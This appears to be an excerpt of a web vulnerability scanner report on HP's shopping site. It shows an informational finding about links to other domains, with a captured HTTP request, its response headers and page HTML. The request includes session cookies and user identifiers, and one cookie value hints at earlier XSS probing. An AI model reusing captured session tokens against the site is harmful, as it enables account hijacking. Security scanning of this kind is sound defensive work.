<a href="http://www.shopping.hp.com/webapp/shopping/mpss_portal.do?jumpid=in_R329_prodexp/hhoslp/footer_my_print_rewards"><img src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/icons/footer_mpr.gif" alt="My Print Rewards" title="My Print Rewards"/></a>
...[SNIP]...
<span class="icon"><img class="img-size" src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/icons/footer_phone.gif" valign="middle" alt="Call us at 1 (888) 999-4747" title="Call us at 1 (888) 999-4747" /></span>
...[SNIP]...
<a href="#" onClick="submitLAForm('SALES_CALLBACK')"><img src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/icons/footer_callback.gif" width="25"    height="25"    border="0" align="absmiddle" title="Request a call with an agent"></a>
...[SNIP]...
<a href="/webapp/shopping/feedback.do?jumpid=in_R329_prodexp/hhoslp/footer_email"><img class="img-size" src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/icons/footer_emailus.gif" valign="absmiddle" alt="Email us" title="Email us"/></a>
...[SNIP]...
<a href="https://www.shopping.hp.com/webapp/shopping/order_status_sign_in.do?jumpid=in_R329_prodexp/hhoslp/footer_order_status"><img class="img-size" src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/icons/footer_orderstatus.gif" valign="absmiddle" alt="Order status" title="Order status" /></a>
...[SNIP]...
</script>


<script type="text/javascript" language="JavaScript" src="http://welcome.hp-ww.com/cma/region/na/metricsHHOstore.js"></script>


<script type="text/javascript" src='http://hpshopping.speedera.net/www.shopping.hp.com/shopping/jsi/ri/main.js'></script>
...[SNIP]...
</script>


<script language="JavaScript" src="http://cts.channelintelligence.com/9919466_landing.js"></script>
...[SNIP]...

7.5. http://www.shopping.hp.com/desktops  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.shopping.hp.com
Path:   /desktops

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /desktops;HHOJSID=HWSJT6HFQjsTjvLKGJywb6ddpcRLmz2xPdythnKG2FZ6ZGygbLyp!133787182?jumpid=in_R329_prodexp/hhoslp/psg/lateralnav_desktops_home HTTP/1.1
Host: www.shopping.hp.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.shopping.hp.com/webapp/shopping/home.do
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hpcomsh_usen=s1=xss&s1_context=hpcomsearch; s_vi=[CS]v1|2731D29105161EB6-600001A4C0302EDC[CE]; mbox=check#true#1316670956|session#1316670895509-389686#1316672756; s_pn=gw:us:en-us:home; s_re=ams; HHOJSID=HWSJT6HFQjsTjvLKGJywb6ddpcRLmz2xPdythnKG2FZ6ZGygbLyp!133787182; hpshopping=1&user_id=mlkpjNmR0Qt%2BNyntuVfacgSd0ic%3D; hpcompc_usen=cartExists=false; lang=en-us; cc=us; OV_VISTA_2009_04_09=0; EMID=; s_depth=2; hp_cust_seg_sel=HHO; gpv_pN=hho%3Ags%3Ahome; s_cc=true; s_sq=%5B%5BB%5D%5D; HP_EBUS_HP_CLICKS=1x1x1

Response

HTTP/1.1 200 OK
Date: Thu, 22 Sep 2011 00:54:39 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8k
Cache-Control: private
Set-Cookie: hpshopping=1&user_id=mlkrg9ye0A55NS%2FpuVTbcgSelmvi; expires=Friday, 20-Jan-2012 00:54:40 GMT; path=/
Set-Cookie: hpcompc_usen=cartExists=false; domain=.hp.com; expires=Friday, 20-Jan-2012 00:54:40 GMT; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 208060


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html lang="en">
<head>
   <!--
...[SNIP]...
<!--stopindex-->


<link href="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/css/hp_screen_003366.css" rel="stylesheet" type="text/css" media="screen">
<link href="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/css/hp_handheld_003366.css" rel="stylesheet" type="text/css" media="handheld">
<link href="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/css/hp_print_003366.css" rel="stylesheet" type="text/css" media="print">


<script language="JavaScript">
...[SNIP]...
<!--stopindex-->

<script language="JavaScript" src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/jsi/newsletter_catalog_utils.js"></script>
<script type="text/javascript" language="JavaScript" src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/jsi/search_utils.js"></script>
...[SNIP]...
<a href="http://www.hp.com/?mtxs=logo&mtxb=store&jumpid=in_R329_prodexp%2Fhhoslp%2Fsplit%2Fhome" title="HP.com home"><img src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/icons/hp_logo_new.png" alt="HP.com home" border="0"></a>
...[SNIP]...
<h2 class="themeheader mb10" style="float: left; width: 73%;">


<img src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/icons/topnav_phone_icon.gif" height="20px" width="20px" align="absmiddle" alt="Call an HP Home & Home Office agent now.&#10Espa&ntilde;ol disponible, lunes a viernes 11 am -- 8 pm, hora del Este" title="Call an HP Home & Home Office agent now.&#10Espa&ntilde;ol disponible, lunes a viernes 11 am -- 8 pm, hora del Este">

<span title="Call an HP Home & Home Office agent now.&#10Espa&ntilde;ol disponible, lunes a viernes 11 am -- 8 pm, hora del Este" alt="Call an HP Home & Home Office agent now.&#10Espa&ntil
...[SNIP]...
</a>&nbsp;&nbsp;<img src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/redesign/white_line.gif" height="10" width="1" alt="">&nbsp;&nbsp;
<a href="http://www.shopping.hp.com/webapp/shopping/help.do" class="themelink">
...[SNIP]...
</a>&nbsp;&nbsp;<img src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/redesign/white_line.gif" height="10" width="1" alt="">&nbsp;&nbsp;<span id="signInLink">
...[SNIP]...
<span class="shopCart"><img src="http://hpshopping.speedera.net/www.shopping.hp.com/s.gif" width="14" height="13" border="0" alt="No items added to the cart"></span>
...[SNIP]...
<!-- Modified    for    NG3    -->


<script    type="text/javascript" language="JavaScript" src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/jsi/topNav.js"></script>
...[SNIP]...
<h4 class="navDropdownsLink"    style="padding: 4px 10px;"><img    src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/icons/hho_icon_home.gif"    title="Home" width="17"    height="20"    border="0"/></h4>
...[SNIP]...
http://www.shopping.hp.com/webapp/shopping/series_can.do?storeName=computer_store&landing=notebooks&a1=Category&v1=Mini&jumpid=in_R329_prodexp/hhoslp/psg/lateralnav_mini_notebooks"    class="colorFFFFFF"><img src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/products/nb1_70.gif" width="70"    height="70"    border="0" title="Mini Netbooks"></a>
...[SNIP]...
app/shopping/series_can.do?storeName=computer_store&landing=notebooks&a1=Category&v1=Everyday%20computing&jumpid=in_R329_prodexp/hhoslp/psg/lateralnav_everyday_computing_notebooks"    class="colorFFFFFF"><img src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/products/nb2_70.gif" width="70"    height="70"    border="0" title="Everyday Computing laptop PCs"></a>
...[SNIP]...
hp.com/webapp/shopping/series_can.do?storeName=computer_store&landing=notebooks&a1=Category&v1=Ultra-Portable&jumpid=in_R329_prodexp/hhoslp/psg/lateralnav_ultra-portable_notebooks"    class="colorFFFFFF"><img src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/products/nb3_70.gif" width="70"    height="70"    border="0" title="Ultra-Portable laptop PCs"></a>
...[SNIP]...
/webapp/shopping/series_can.do?storeName=computer_store&landing=notebooks&a1=Category&v1=High%20performance&jumpid=in_R329_prodexp/hhoslp/psg/lateralnav_high_performance_notebooks"    class="colorFFFFFF"><img src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/products/nb4_70.gif" width="70"    height="70"    border="0" title="High Performance laptop PCs"></a>
...[SNIP]...
http://www.shopping.hp.com/webapp/shopping/series_can.do?storeName=computer_store&landing=notebooks&a1=Category&v1=ENVY&jumpid=in_R329_prodexp/hhoslp/psg/lateralnav_envy_notebooks"    class="colorFFFFFF"><img src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/products/nb5_70.gif" width="70"    height="70"    border="0" title="ENVY laptop PCs"></a>
...[SNIP]...
<a href="http://www.shopping.hp.com/can/computer/categories/notebook_batteries/1/accessories?jumpid=in_R329_prodexp/hhoslp/psg/lateralnav_notebook_batteries" class="colorFFFFFF"><img src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/products/nb6_70.gif" width="70"    height="70"    border="0" title="Laptop batteries"></a>
...[SNIP]...
p/shopping/series_can.do?storeName=computer_store&landing=notebooks&a1=See%20all&v1=series&jumpID=in_R329_prodexp/hhoslp/psg/lateralnav_all_customizable_laptop_mini_netbook_series"    class="colorFFFFFF"><img src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/products/nb7_70.gif" width="70"    height="70"    border="0" title="All customizable laptop PCs"></a>
...[SNIP]...
hopping.hp.com/webapp/shopping/can.do?storeName=storefronts&catLevel=1&landing=rts_notebook&category=rts_notebook&jumpid=in_R329_prodexp/hhoslp/psg/lateralnav_quick_ship_notebooks" class="colorFFFFFF"><img    src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/products/nb8_70.gif" width="70"    height="70"    border="0" title="Quick-ship desktop PCs available to ship within 24 hours"></a>
...[SNIP]...
ebapp/shopping/series_can.do?storeName=computer_store&landing=desktops&a1=Category&v1=Everyday%20computing&jumpid=in_R329_prodexp/hhoslp/psg/lateralnav_everyday_computing_desktops"    class="colorFFFFFF"><img src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/products/dt1_70.gif" width="70"    height="70"    border="0" title="Everyday computing desktop pcs"></a>
...[SNIP]...
g.hp.com/webapp/shopping/series_can.do?storeName=computer_store&landing=desktops&a1=Category&v1=Slim%20and%20sleek&jumpid=in_R329_prodexp/hhoslp/psg/lateralnav_slim_sleek_desktops"    class="colorFFFFFF"><img src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/products/dt2_70.gif" width="70"    height="70"    border="0" title="Slim and sleek desktop PCs"></a>
...[SNIP]...
ing.hp.com/webapp/shopping/series_can.do?storeName=computer_store&landing=desktops&a1=Category&v1=All-in-One%20PCs&jumpid=in_R329_prodexp/hhoslp/psg/lateralnav_all_in_one_desktops"    class="colorFFFFFF"><img src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/products/dt3_70.gif" width="70"    height="70"    border="0" title="All-in-One pcs"></a>
...[SNIP]...
.com/webapp/shopping/store_access.do?template_type=computer_store&landing=desktops&a1=Category&v1=TouchSmart%20PCs&jumpid=in_R329_prodexp/hhoslp/psg/lateralnav_TouchSmart_desktops"    class="colorFFFFFF"><img src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/products/dt4_70.gif" width="70"    height="70"    border="0" title="TouchSmart All-in-One PCs"></a>
...[SNIP]...
om/webapp/shopping/series_can.do?storeName=computer_store&landing=desktops&a1=Category&v1=High%20performance&jumpid=in_R329_prodexp/hhoslp/psg/lateralnav_high_performance_desktops"    class="colorFFFFFF"><img src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/products/dt5_70.gif" width="70"    height="70"    border="0" title="High performance desktop PCs"></a>
...[SNIP]...
ng.hp.com/webapp/shopping/series_can.do?storeName=computer_store&landing=desktops&a1=See+all&v1=series&jumpID=in_R329_prodexp/hhoslp/psg/lateralnav_all_customizable_desktop_series"    class="colorFFFFFF"><img src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/products/dt6_70.gif" width="70"    height="70"    border="0" title="All customizable desktop PCs "></a>
...[SNIP]...
w.shopping.hp.com/webapp/shopping/can.do?storeName=storefronts&catLevel=1&landing=rts_desktop&category=rts_desktop&jumpid=in_R329_prodexp/hhoslp/psg/lateralnav_quick_ship_desktops"    class="colorFFFFFF"><img src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/products/dt7_70.gif" width="70"    height="70"    border="0" title="Quick-ship desktop PCs available to ship within 24 hours"></a>
...[SNIP]...
<a href="http://www.shopping.hp.com/can/display/display/1/storefronts?jumpid=in_R329_prodexp/hhoslp/psg/lateralnav_monitors" class="colorFFFFFF"><img    src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/products/dt8_70.gif" width="70"    height="70"    border="0" title="Monitors"></a>
...[SNIP]...
f="http://www.shopping.hp.com/webapp/shopping/can.do?storeName=storefronts&catLevel=1&landing=rts_tablet&category=rts_tablet&jumpid=in_R329_prodexp/hhoslp/psg/lateralnav_touchpads" class="colorFFFFFF"><img    src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/products/tb2_70.gif" width="70"    height="70"    border="0" title="TouchPads"></a>
...[SNIP]...
<a    href="http://www.shopping.hp.com/can/handheld/iPAQ/2/storefronts?sort=Desc&jumpid=in_R329_prodexp/hhoslp/psg/lateralnav_smartphones" class="colorFFFFFF"><img    src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/products/tb3_70.gif" width="70"    height="70"    border="0" title="Smartphones"></a>
...[SNIP]...
<a href="http://www.shopping.hp.com/can/esp/Notebook/1/storefronts?jumpid=in_R329_prodexp/hhoslp/psg/lateralnav_extended_service_plan_notebooks" class="colorFFFFFF"><img    src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/products/sh1_70.gif" width="70"    height="70"    border="0" title="HP Care Packs for Laptops"></a>
...[SNIP]...
<a href="http://www.shopping.hp.com/can/esp/Desktop/1/storefronts?jumpid=in_R329_prodexp/hhoslp/psg/lateralnav_services_desktops"    class="colorFFFFFF"><img src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/products/sh2_70.gif" width="70"    height="70"    border="0" title="HP Care Packs for Desktops"></a>
...[SNIP]...
<a href="http://www.shopping.hp.com/can/esp/Printer/1/storefronts?jumpid=in_R329_prodexp/hhoslp/ipg/lateralnav_extended_service_plan_printers" class="colorFFFFFF"><img src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/products/sh3_70.gif" width="70" height="70" border="0" title="HP Care Packs for Printers"></a>
...[SNIP]...
ef="http://www.shopping.hp.com/webapp/shopping/can.do?landing=printer&category=Photosmart&catLevel=1&storeName=storefronts&jumpid=in_R329_prodexp/hhoslp/ipg/lateralnav_photosmarts"    class="colorFFFFFF"><img src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/products/p1_70.gif"    width="70" height="70" border="0"    title="Photosmart"></a>
...[SNIP]...
href="http://www.shopping.hp.com/webapp/shopping/can.do?landing=printer&category=Officejet&catLevel=1&storeName=storefronts&jumpid=in_R329_prodexp/hhoslp/ipg/lateralnav_officejets"    class="colorFFFFFF"><img src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/products/p2_70.gif"    width="70" height="70" border="0"    title="Officejet"></a>
...[SNIP]...
ttp://www.shopping.hp.com/webapp/shopping/can.do?landing=printer&category=Officejet+Pro&catLevel=1&storeName=storefronts&jumpID=in_R329_prodexp/hhoslp/ipg/lateralnav_officejet_pro"    class="colorFFFFFF"><img src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/products/p3_70.gif"    width="70" height="70" border="0"    title="Officejet Pro"></a>
...[SNIP]...
a href="http://www.shopping.hp.com/webapp/shopping/can.do?landing=printer&category=LaserJet&catLevel=1&storeName=storefronts&jumpid=in_R329_prodexp/hhoslp/ipg/lateralnav_laserjets"    class="colorFFFFFF"><img src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/products/p4_70.gif"    width="70" height="70" border="0"    title="LaserJet"></a>
...[SNIP]...
<a href="http://www.shopping.hp.com/webapp/shopping/can.do?landing=printer&category=Deskjet&catLevel=1&storeName=storefronts&jumpid=in_R329_prodexp/hhoslp/ipg/lateralnav_deskjets"    class="colorFFFFFF"><img src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/products/p5_70.gif"    width="70" height="70" border="0"    title="Deskjet"></a>
...[SNIP]...
ww.shopping.hp.com/webapp/shopping/can.do?landing=printer&category=all-in-one&catLevel=1&storeName=storefronts&jumpID=in_R329_prodexp/hhoslp/ipg/lateralnav_multi_function_printers" class="colorFFFFFF"><img    src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/products/p6_70.gif"    width="70" height="70" border="0"    title="All all-in-one printers"></a>
...[SNIP]...
Name=storefronts&landing=printer&category=HP&orderflow=1&a1=Wireless+capability%0D%0A&v1=Yes&catLevel=2#bcAnchor&jumpID=in_R329_prodexp/hhoslp/ipg/lateralnav_wireless_all_printers" class="colorFFFFFF"><img    src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/products/p7_70.gif"    width="70" height="70" border="0"    title="All wireless printers"></a>
...[SNIP]...
shopping.hp.com/webapp/shopping/can.do?landing=printer&lanAttr=HP+ePrint&category=Yes&catLevel=1&storeName=storefronts&jumpid=in_R329_prodexp/hhoslp/ipg/lateralnav_eprint_printers"    class="colorFFFFFF"><img src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/products/p8_70.gif"    width="70" height="70" border="0"    title="All ePrint printers"></a>
...[SNIP]...
w.shopping.hp.com/webapp/shopping/print_supp_acc_landing.do?landing=supplies&selectMenu=cartridges_paper&suppliesType=ink&jumpid=in_R329_prodexp/hhoslp/ipg/lateralnav_ink_supplies"    class="colorFFFFFF"><img src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/products/s1_70.gif"    width="70" height="70" border="0"    title="Ink"></a>
...[SNIP]...
opping.hp.com/webapp/shopping/print_supp_acc_landing.do?landing=supplies&selectMenu=cartridges_paper&suppliesType=toner&jumpID=in_R329_prodexp/hhoslp/ipg/lateralnav_toner_supplies"    class="colorFFFFFF"><img src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/products/s2_70.gif"    width="70" height="70" border="0"    title="Toner"></a>
...[SNIP]...
f="http://www.shopping.hp.com/webapp/shopping/supplies_category.do?landing=printing_supplies&category=paper&cat_level=1?jumpid=in_R329_prodexp/hhoslp/ipg/lateralnav_paper_supplies"    class="colorFFFFFF"><img src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/products/s3_70.gif"    width="70" height="70" border="0"    title="Paper"></a>
...[SNIP]...
<a    href="http://www.shopping.hp.com/accessories-store/computer?jumpid=in_R329_prodexp/hhoslp/psg/lateralnav_all_electronics"    class="colorFFFFFF"><img    src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/products/mp1_70.gif" width="70"    height="70"    border="0" title="All electronics"></a>
...[SNIP]...
<a href="http://www.shopping.hp.com/can/computer/categories/tvs/1/accessories?jumpid=in_R329_prodexp/hhoslp/psg/lateralnav_tvs" class="colorFFFFFF"><img    src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/products/mp2_70.gif" width="70"    height="70"    border="0" title="TVs"></a>
...[SNIP]...
<a href="http://www.shopping.hp.com/can/computer/categories/digital_cameras/1/accessories?jumpid=in_R329_prodexp/hhoslp/psg/lateralnav_digital_cameras" class="colorFFFFFF"><img    src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/products/mp3_70.gif" width="70"    height="70"    border="0" title="Cameras &amp; video"></a>
...[SNIP]...
<a    href="http://www.shopping.hp.com/design?jumpid=in_R329_prodexp/hhoslp/psg/lateralnav_deals_on_electronics"     class="colorFFFFFF"><img    src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/products/mp4_70.gif" width="70"    height="70"    border="0" title="Deals on electronics"></a>
...[SNIP]...
<a    href="http://www.shopping.hp.com/can/computer/categories/photo_frames/1/accessories?jumpid=in_R329_prodexp/hhoslp/psg/lateralnav_lateralnav_photo_frames"    class="colorFFFFFF"><img src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/products/mp5_70.gif" width="70"    height="70"    border="0" title="Photo frames"></a>
...[SNIP]...
<a    href="http://www.shopping.hp.com/can/calculator/HP/1/storefronts?jumpid=in_R329_prodexp/hhoslp/psg/lateralnav_calculators" class="colorFFFFFF"><img src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/products/mp6_70.gif" width="70"    height="70"    border="0" title="Calculators"></a>
...[SNIP]...
<a    href="http://www.shopping.hp.com/can/computer/categories/software/1/accessories?jumpid=in_R329_prodexp/hhoslp/psg/lateralnav_software" class="colorFFFFFF"><img src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/products/mp7_70.gif" width="70"    height="70"    border="0" title="Boxed Software"></a>
...[SNIP]...
<p align="center" class="col21pctL    p5 m0"><a    href="http://hp.digitalriver.com/store/hpappli/DisplayHomePage/?jumpid=ex_hpds_lateralnav_download" class="colorFFFFFF"><img src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/products/mp8_70.gif" width="70"    height="70"    border="0" title="Downloadable Software (non-HP, partner site)"></a><br><a    href="http://hp.digitalriver.com/store/hpappli/DisplayHomePage/?jumpid=ex_hpds_lateralnav_download" class="colorFFFFFF">Downloadable<br>
...[SNIP]...
<a href="http://www.shopping.hp.com/accessories-store/computer?jumpid=in_R329_prodexp/hhoslp/psg/lateralnav_all_accessories" class="colorFFFFFF"><img    src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/products/a1_70.gif"    width="70" height="70" border="0"    title="All accessories"></a>
...[SNIP]...
<a href="http://www.shopping.hp.com/can/computer/categories/storage_solutions/2/accessories?jumpid=in_R329_prodexp/hhoslp/psg/lateralnav_storage" class="colorFFFFFF"><img    src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/products/a2_70.gif"    width="70" height="70" border="0"    title="Storage"></a>
...[SNIP]...
<a href="http://www.shopping.hp.com/can/computer/categories/mice_keyboards/2/accessories?jumpid=in_R329_prodexp/hhoslp/psg/lateralnav_peripherals" class="colorFFFFFF"><img    src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/products/a3_70.gif"    width="70" height="70" border="0"    title="Keyboards & Mice"></a>
...[SNIP]...
<a    href="http://www.shopping.hp.com/design?jumpid=in_R329_prodexp/hhoslp/psg/lateralnav_deals_on_accessories"     class="colorFFFFFF"><img    src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/products/a4_70.gif"    width="70" height="70" border="0"    title="Deals on accessories"></a>
...[SNIP]...
<a    href="http://www.shopping.hp.com/can/computer/categories/carrying_cases/1/accessories?jumpid=in_R329_prodexp/hhoslp/psg/lateralnav_carrying_cases" class="colorFFFFFF"><img    src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/products/a5_70.gif"    width="70" height="70" border="0"    title="Cases"></a>
...[SNIP]...
<a    href="http://www.shopping.hp.com/can/computer/categories/networking/2/accessories?jumpid=in_R329_prodexp/hhoslp/ipg/lateralnav_networking" class="colorFFFFFF"><img src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/products/a6_70.gif" width="70"    height="70"    border="0" title="Networking"></a>
...[SNIP]...
<a    href="http://www.shopping.hp.com/can/computer/categories/speakers_headsets/1/accessories?jumpid=in_R329_prodexp/hhoslp/psg/lateralnav_lateralnav_pc_audio" class="colorFFFFFF"><img src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/products/a7_70.gif" width="70"    height="70"    border="0" title="PC Audio"></a>
...[SNIP]...
<a    href="http://www.shopping.hp.com/accessories-store/touchpad?jumpid=in_R329_prodexp/hhoslp/ipg/lateralnav_touchpad_accessories" class="colorFFFFFF"><img    src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/products/a8_70.gif" width="70"    height="70"    border="0" title="TouchPad accessories"></a>
...[SNIP]...
//www.shopping.hp.com/webapp/shopping/series_can.do?storeName=computer_store&landing=notebooks&a1=Usage&v1=Business&jumpid=in_R329_prodexp/hhoslp/psg/lateralnav_business_notebooks" class="colorFFFFFF"><img    src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/products/hoc1_70.gif"    width="70" height="70" border="0"    title="Laptop PCs and netbooks"></a>
...[SNIP]...
shopping/can.do?storeName=storefronts&landing=rts_notebook&category=rts_notebook&a1=Category&v1=business&catLevel=2#bcAnchor&jumpid=in_R329_prodexp/hhoslp/psg/lateralnav_elitebook" class="colorFFFFFF"><img    src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/products/hoc2_70.gif"    width="70" height="70" border="0"    title="Elitebook and Probook business laptop PCs"></a>
...[SNIP]...
<a    href="http://www.shopping.hp.com/esp?jumpid=in_R329_prodexp/hhoslp/psg/lateralnav_services" class="colorFFFFFF"><img    src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/products/hoc3_70.gif"    width="70" height="70" border="0"    title="HP Care Pack Services"></a>
...[SNIP]...
ww.shopping.hp.com/webapp/shopping/series_can.do?storeName=computer_store&landing=servers&a1=See%20all&v1=series&jumpid=in_R329_prodexp/hhoslp/psg/lateralnav_business_home_servers" class="colorFFFFFF"><img    src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/products/hoc4_70.gif"    width="70" height="70" border="0"    title="Servers"></a>
...[SNIP]...
p://www.shopping.hp.com/webapp/shopping/series_can.do?storeName=computer_store&landing=desktops&a1=Usage&v1=Business&jumpid=in_R329_prodexp/hhoslp/psg/lateralnav_business_desktops" class="colorFFFFFF"><img    src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/products/hoc5_70.gif"    width="70" height="70" border="0"    title="Desktop and all-in-one PCs"></a>
...[SNIP]...
ttp://www.shopping.hp.com/webapp/shopping/store_access.do?template_type=storefronts&landing=display&category=display&jumpid=in_R329_prodexp/hhoslp/psg/lateralnav_business_monitors" class="colorFFFFFF"><img    src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/products/hoc6_70.gif"    width="70" height="70" border="0"    title="Monitors"></a>
...[SNIP]...
="http://www.shopping.hp.com/webapp/shopping/can.do?landing=printer&category=office&catLevel=1&storeName=storefronts&jumpid=in_R329_prodexp/hhoslp/ipg/lateralnav_business_printers" class="colorFFFFFF"><img    src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/products/hoc7_70.gif"    width="70" height="70" border="0"    title="Printers and all-in-ones"></a>
...[SNIP]...
<a href="http://www.shopping.hp.com/webapp/shopping/store_access.do?template_type=all_supplies&jumpid=in_R329_prodexp/hhoslp/ipg/lateralnav_business_ink_and_toner" class="colorFFFFFF"><img    src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/products/hoc8_70.gif "    width="70" height="70" border="0"    title="Ink, Toner & Paper"></a>
...[SNIP]...
hopping.hp.com/webapp/shopping/can.do?storeName=storefronts&catLevel=1&landing=rts_notebook&category=rts_notebook&jumpid=in_R329_prodexp/hhoslp/psg/lateralnav_quick_ship_notebooks" class="colorFFFFFF"><img    src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/products/qs1_70.gif" width="70"    height="70"    border="0" title="Quick-ship laptops PCs available to ship within 24 hours"></a>
...[SNIP]...
w.shopping.hp.com/webapp/shopping/can.do?storeName=storefronts&catLevel=1&landing=rts_desktop&category=rts_desktop&jumpid=in_R329_prodexp/hhoslp/psg/lateralnav_quick_ship_desktops" class="colorFFFFFF"><img    src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/products/qs2_70.gif" width="70"    height="70"    border="0" title="Quick-ship desktop PCs available to ship within 24 hours"></a>
...[SNIP]...
ef="http://www.shopping.hp.com/webapp/shopping/express_store.do?landing=express_store&selectMenu=specialty_store&jumpid=in_R329_prodexp/hhoslp/split/lateralnav_quick_ship_products" class="colorFFFFFF"><img    src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/products/qs3_70.gif" width="70"    height="70"    border="0" title="All Quick-ship products"></a>
...[SNIP]...
<a    href="http://www.shopping.hp.com/webapp/shopping/offers_guide.do?jumpid=in_R329_prodexp/hhoslp/psg/lateralnav_hot_offers" class="colorFFFFFF"><img    src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/products/do1_70.gif" width="70"    height="70"    border="0" title="HP and partner offers on current products"></a>
...[SNIP]...
<a    href="http://www.shopping.hp.com/outlet?jumpid=in_R329_prodexp/hhoslp/psg/lateralnav_outlet_centre"    class="colorFFFFFF"><img    src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/products/do2_70.gif" width="70"    height="70"    border="0" title="Markdowns and closeout deals"></a>
...[SNIP]...
<a    href="http://www.shopping.hp.com/webapp/shopping/mpss_portal.do?jumpid=in_R329_prodexp/hhoslp/psg/lateralnav_mpr" class="colorFFFFFF"><img    src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/products/do3_70.gif" width="70"    height="70"    border="0" title="Exclusive offers on ink, toner, and paper"></a>
...[SNIP]...
<a href="http://www.shopping.hp.com/go/microsoftoffers?jumpid=in_R329_prodexp/hhoslp/split/lateralnav_deals_banner/sitewide_top_nav_banner_xbox_offer_911" title='Click to see details'><img style="" src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/banners/topnav_sitewide_250x50_091111.jpg" width="250" height="50" border="0" alt="Click to see details" title ="Click to see details" longdesc=""></a>
...[SNIP]...
<td><img src="http://hpshopping.speedera.net/www.shopping.hp.com/s.gif" width="1" height="15" alt=""></td>
